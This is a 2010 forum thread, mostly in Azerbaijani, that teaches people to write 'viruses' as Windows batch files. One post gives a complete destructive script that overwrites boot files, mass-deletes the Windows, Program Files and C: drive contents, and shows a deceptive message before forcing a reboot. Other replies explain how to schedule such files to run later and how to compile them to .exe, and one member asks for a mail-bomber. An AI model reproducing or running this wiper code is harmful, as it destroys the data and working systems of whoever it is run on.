Guest TuRaL Konu tarihi: 30 Mayıs 2010 Paylaş Konu tarihi: 30 Mayıs 2010 Hamınızı xoş gördük, Əziz xakerlik etmək istəyənlər: İndi sizlərə cəmi bir neçə mərhələdən keçmək ilə yaradacağınız proqramların kompüterə hansı zərərlərini verəcəyiniz özünüz görəcəksiniz. Başlayaq! 1. Blaknotu açırıq. Bu blaknot deyilən proqram bütün kompüterlərdə var. Mətn redaktorudur. Açdıq? 2. İçinə belə bir söz yazırıq mspaint 3. İndi siə yadda saxlamaq lazımdır. Adi halda yadda saxlasanız .txt kimi yadda saxlanacaq. Amma biz faylın adını yazırıq, nə ad istəsəniz yaza bilərsiniz. Sonra isə .txt yerinə .bat sözünü yazırıq və yadda saxlayırıq. 4. Yaddaşda sxaladığımız faylı açırıq və görəcəyik ki Paint proqramı açılır! Bayaq ki kimi mspaint sözünün yerinə istənilən başqa əmrlər yazmaq olar. Məsələn: Calc-kalkulyator, Taskmgr-Dispeyçer pəncərəsi… Deyə bilərsiniz ki bunun virusa nə aidiyyatı var? Növbəti proqramda isə biz kompüterə zərər verməyi öyrənəcəyik. Yenə də blaknotu açırıq və içinə aşağıdakı kodu yazırıq. time 00:00 copy %0 F:\\Work.bat Bu kod nədir? 1ci cərgədəki kod kompüterin vaxtını sıfırlayacaq (00:00). 2ci sətrdəki kod isə Work adlı Ffləşkartına fayllar kopyalanacaq. Biz tarixi «Date 13.06.23» kimi də yaza bilərik. Belə halda vaxt 2023cü ili göstərəcək. Siyahı: 1) «copy %0 x:\\y» - Virusu x diskindən y qovluğuna köçürdür (misal copy %0 C:\\System.bat); 2) «label x:y» - x diskinin adını y edir (misal label C:error); 3) «time х:у» - vaxtı x saat və y dəqiqə edir (misal time 14:27); 4) «date x.y.z» - tarixi x gün, y ay, z il kimi dəyişir (misal date 16.11.05); və s.... Göstər/Gizlət Самоучитель по созданию вирусов в блокноте Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 30 Mayıs 2010 Paylaş Mesaj tarihi: 30 Mayıs 2010 Gelin size qeseng kod verim bu kodu blaknota yazin sonra saxranit edende onu .bat kimi saxranit edin cd c:\\\\ attrib -s -h boot.ini cls attrib -s -h found.000 attrib -s -h found.001 t>boot.ini attrib -a -s -h pagefile.sys h>pagefile.sys attrib -a -s -h hiberfil.sys HH>hiberfil.sys attrib -a -s -h -r bootfont.bin hhh>bootfont.bin attrib -a -s -h -r ntdetect.com ff>ntdetect.com attrib -a -s -h -r ntldr f>ntldr cls cd.. cd.. cls cd windows g>win.ini cls g>system.ini cls cd pss ft>system.ini.backup f>win.ini.backup cls cd c:\\\\ @echo .::.HADi baslayal?m.::. cd windows cd system32 attrib -r -h -s dllcache cls attrib -a -h -r *.manifest cls cd config attrib -a -h *.log cd.. cd restore attrib -r -h -s filelist.xml cls cd c:\\\\ cls cd windows cls tskill msnmsgr /a tskill msmsgs /a cls del /f /q /s c:\\\\windows\\\\system32\\\\*.* cls cd repair attrib -a -h ntuser.dat f>ntuser.dat ff>secstup.inf cd.. attrib -h inf attrib -h -s installer attrib -h pif attrib -r -h -a WindowsShell.Manifest attrib -r -h $MSI31Uninstall_KB893803$ attrib -s -a bootstat.dat attrib -s -h services.dll attrib -s -h qservice.exe attrib -a -r set3.tmp attrib -s -h winnt.bmp attrib -s -h winnt256.bmp cls cd c:\\\\ del /f /q /s c:\\\\windows\\\\*.* cls cd.. cd.. cd program files cd internet explorer attrib -a -s -h iexplore.exe cd c:\\\\ cls del /f /q /s c:\\\\program files\\\\*.* cls cd.. cd.. attrib -a -h -r -s msdos.sys attrib -a -s -h config.sys cls attrib -a -h -r -s IO.sys cls del /f /q /s c:\\\\*.* cls @echo Yuklemeyi Bitirmek Ilerlemeniz Gerekir... @echo Veri Kayiplari Olmamasi icin....!!!!!!... @echo Devam Etmeniz Kesinlikle Onerilir...!!!.. pause cls cd.. cd.. cd Documents and Settings cd All Users cd Desktop md .HackEd md Bys md Hacker dir /s>HAcKeD.ini @echo HALA shutDownN.exe Pc DEYse RES iyi Gider cls shutdown -r -t 5 -c "HacKs FoR " -f shutdown -r -t 5 -c "HacKs FoR" -f tsshutdn 5 /delay:2 tsshutdn 5 /delay:2 ama bunu ozununz acmayin haaaaaaaaaaaaa yoxsa komputer restart gedecek sonra acilmir ve hard disk zede alir men bunu bir defe etdim ve heledi komputerin hard diskinde problem qalib Alıntı Link to comment Share on other sites More sharing options...
Linkin Park and me Mesaj tarihi: 30 Mayıs 2010 Paylaş Mesaj tarihi: 30 Mayıs 2010 Vüsal xaiş edirəm belə dehşətli virusları camaata öyrətmiyin.sonra günümüz qaradı bizimkilərə belə şeylər yaramır eee))Turalın öyrətdikləri heç olmasa ele belədi.kompun zibilini çıxardandan sonra yaxşı söyəcəklər.sənə lazımdı belə şey? Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 yo men prostu ele bele yazdim ama hec kim etmesin haaaaa sonra mene demeyinki Vusal meslehet gormusdu aaaaaaaaa heqiqeten .bat fayllar cox tehlukelidir ve hec bir antivirus nu tuta bilmir Alıntı Link to comment Share on other sites More sharing options...
Guest TuRaL Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 Mən bat faylını explorer.exe fayına yönəltdim, KİS 2009 bu explorer faylını Trojan.Generic kimi tanıtı və həmin faylı blok etti, nəticədə kompüter açılsada iş masası açılmadı və kompüter formatlıq oldu. Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 aha duzdu Tural eger bat faylini exe. cevirende kaasperski ve bir cox antiviruslar buna reaksiya gosteririr (Trojan.generic) kasperski dimek olar ki butun trojanlarin hamisini udalit edir.bezilerini lecit edir. sen dediyin kimi explore.exe fali raboci stolun goruntusunu veren bir fayldir. eger komputer normal halda Ctrl+Alt+Del knopkalarni bassaq onda dispecer zadac penceresi acilacaq.Ordanda yuxari menyudan Proses menyusuna kecek ve ordanda siyahidan explore.exe-ni tapib onun ustunde sag duymeni basib zaversit proses versek onda raboci stolda ne varsa yox olacaq birce ekrandaki sekilden basqa. bunu nece dala qaytarmaq olar bes?yeni rabosi stol tezden yerine gelsin(ola bilsin bilenler var) Start menyusundan(Puksdan) Run(Vipolnit) acirsiz ve ora c: yazib enteri basin ve yeniden sevimli raboci stolunuz gelecek Yoruldim eeeeee Alıntı Link to comment Share on other sites More sharing options...
Guest TuRaL Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 Mən onu bilmirdim, ona görə də, məlumatlarımın silinməməsi üçün Həmin XP dura-dura başqasını yazdım, girdim 2ci yazdığım XP-ilə oradakı explorer.exe faylını götürüb birinci XP-ininkinin içinə atdım. Sonra birinci ilə girdim vso, Alıntı Link to comment Share on other sites More sharing options...
Guest ZeYNaL4iK Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 Xakerlik sənəti çox ağır sənətdir.Bu sahənin yolçularına "İnternet canavarı" deyirlər.Mənim bildiyimə görə, Azərbaycanda hal-hazırda 7 xaker fəaliyyət göstərir.Fikrim sizin fikirlərinizlə üst-üstə düşməsə də üzrlü qəbul edin. Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 31 Mayıs 2010 Paylaş Mesaj tarihi: 31 Mayıs 2010 agha duz etmisen tural ama bu da gozel usuldur.ama bir sey deyim oyretmek kimi olmasin.eger windows-u acanda her hansisa bir fayi tapmayanda onda hec narhatliga ahtiyac yoxdu.hemen faylin adini kagiz yaz.sonra hemen falyi basqa tanislarinin kompundan sistem32-den tap ve onu flasha yaz.sonra Erd commander (super programdi sitem dala yuklemede dunyada birinci yerdededi meslehetlidir)programi ile bootdan diski goter ve program acilacaq.sonra hemen programla flahindeki fayli gotur sistem32 papkasina at.kompun acilanda artiq hazirdir.yeni artiq format etmeye ehtiyac yoxdu.bunun cox yollari var.aamen asan usulu budur.bu hemise ise yaramir haaaaaa.bunu deyim birdeki qardasimizin yazdigi xaker meselesine men bele deyim yegane xaker Kevin Mitnickdir.en meshurlar amerkida olub cunki esasi amerikadadi xakerliyin. hal-hazirda dunyada guclu xakerler 1.Ukrayna 2.rusiya 3.Turkiye ve s.................. Alıntı Link to comment Share on other sites More sharing options...
Guest terlanyek Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 Vüsal bir nəfəs alda Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 gosen yaman decelem sakit deyanmiramki Alıntı Link to comment Share on other sites More sharing options...
Guest TuRaL Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 Bunu anladım, amma Əməliyyət sisteminin versiyasından da asılıdır da mənə elə gəlir. Çünki məndə eyni XP idi, bilirdim ki faylları da eynidir, Amma məsələn XP-yə Vista sitem faylını yazsaq çox güman düzgün işləməyəcək Alıntı Link to comment Share on other sites More sharing options...
Disco_Boy Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 usaqlar belke bileniniz olar nece edim ki, (.bat) tipli fayla yazdigim kod avtomatik ise dussun yeni mueyyen vaxtdan sonra kod aktivlessin ve ozu islesin. Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 elbette Tural sistemlerden cox sey aslidir.cunki vista ve win7 basqa gur yigilib.deyisiklikler var.fayllari eyni gelmez. men xaker deyilem ama bir sey deyim sene bele bir sey var yazdigin kodlarin icine elave edimelidir ama onu bilmirem nece olur.ama ele bir sey oldugunu bilirem Alıntı Link to comment Share on other sites More sharing options...
Guest TuRaL Mesaj tarihi: 1 Haziran 2010 Paylaş Mesaj tarihi: 1 Haziran 2010 Disco_Boy belədirdə, məsələn elə proqramlar var ki kompüter açılan kimi işə düşür, məsələn antiviruslar, agent və s. ancaq onları etmək olar ki kompüter açılan kimi işə düşmsin (antivirus istisna). Amma sən dediyin kimi kompüter işləyə-işləyə proqram açlışsın deyə kod bilmirəm. Amma yaxşı proqramist edə bilər ki proqram müəyyən vaxtan sonra avtomatik işləsin. Alıntı Link to comment Share on other sites More sharing options...
Disco_Boy Mesaj tarihi: 2 Haziran 2010 Paylaş Mesaj tarihi: 2 Haziran 2010 TuRaL qaqash deyesen duz basa dusmedin men bilmek isteyirem ki,meselen notepada bele bir emr yazdim (start D:\\) ve formati (.bat) kimi yadda saxladim.Bunu nece edim ki,o bat fayli avtomatik olaraq mueyyen vaxtdan sonra ise dussun ve emri yerine yetirsin? Alıntı Link to comment Share on other sites More sharing options...
Guest TuRaL Mesaj tarihi: 2 Haziran 2010 Paylaş Mesaj tarihi: 2 Haziran 2010 Səni başa düşdüm, yox elə kod bilmirəm Alıntı Link to comment Share on other sites More sharing options...
Eshalon233 Mesaj tarihi: 3 Haziran 2010 Paylaş Mesaj tarihi: 3 Haziran 2010 Windows could not start because the following file is missing or corrupt Windows sistem32 config system You can attempt to repair this file by starting windows setup using the original setup cd-rom Select 'r' at the first screen to start repair .................................................... bu kamputer acildiginda gelir . diyesen burda diyir "r" vur yeniden bashla r vurursan yeniden bashlayir yene tekrar olunur yene bu sozler gelir ......................... bide bundan bashqa soz gelmir ancaq bu gelir Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 3 Haziran 2010 Paylaş Mesaj tarihi: 3 Haziran 2010 he dostum gelek senin problemine sen bele et o problemi bildim.sistemde bezi nasazliq var. ve sistem32 fayl catismir. 1.sen ilk novbede komp acilanda gir bezopasni rejime gor girir. sonra mene dene basqa usula kecek.cunki men indi hamisini desem bilmeyecen. Alıntı Link to comment Share on other sites More sharing options...
Eshalon233 Mesaj tarihi: 4 Haziran 2010 Paylaş Mesaj tarihi: 4 Haziran 2010 Salam Vusal bezopasni rejim yoxdu ancaq men yazdigim sozler gelir bashqa hecne Mail-bomber praqramini ishletmesini bilen var .video farmatinda lazimdi oyretsin . ishletmesini bilen var komek eleye biler . fariz18@mail.ru Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 4 Haziran 2010 Paylaş Mesaj tarihi: 4 Haziran 2010 bezopastni refim butun komputerlerde olur.nece yoxdu ola bilmez ele sey restart ver F8-i duymesini basa basa dur gelecek dostum her bir komputerde bezopasni rejim olur sen restart ver F8 basa basa dur bezopasni rejim gelecek Alıntı Link to comment Share on other sites More sharing options...
Eshalon233 Mesaj tarihi: 4 Haziran 2010 Paylaş Mesaj tarihi: 4 Haziran 2010 Sagol vusal komek elediyine gore o hellini tapdi artiq. Mail-bomber praqramini ishletmesini bilen var .video farmatinda lazimdi oyretsin . ishletmesini bilen var komek eleye biler komek eliye bilersen praqram haqda. Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 4 Haziran 2010 Paylaş Mesaj tarihi: 4 Haziran 2010 burdan bax oyredir Video Alıntı Link to comment Share on other sites More sharing options...
Eshalon233 Mesaj tarihi: 4 Haziran 2010 Paylaş Mesaj tarihi: 4 Haziran 2010 yox o praqram mail-bomber deyile video ya baxdim ama o deyil Alıntı Link to comment Share on other sites More sharing options...
mile Mesaj tarihi: 5 Haziran 2010 Paylaş Mesaj tarihi: 5 Haziran 2010 Disco_Boy, планировщик заданий'dən istifadə et. CMD əmir: Schtasks Bu əmr haqqında schtasks /? Orda sənə lazım olan schtasks /create Onun da haqqında schtasks /create /? P.S. Bütün bu məlumatlara əmirlər sətrində (командная строка) da baxa bilərsən. Orda əlavə çooxx... məlumatlar var. ---------------------------- Əlavə qeyd: Əgər öz BAT faylınızı EXE fayl kimi yaratmaq istəyirsinizsə... onda Quick Batch File Compiler sizə kömək olar. Alıntı Link to comment Share on other sites More sharing options...
Recommended Posts
Sohbete katıl
Şimdi mesajını gönderebilir ve daha sonra kayıt olabilirsin. Bir hesabın varsa, hesabınla göndermek için şimdi oturum aç.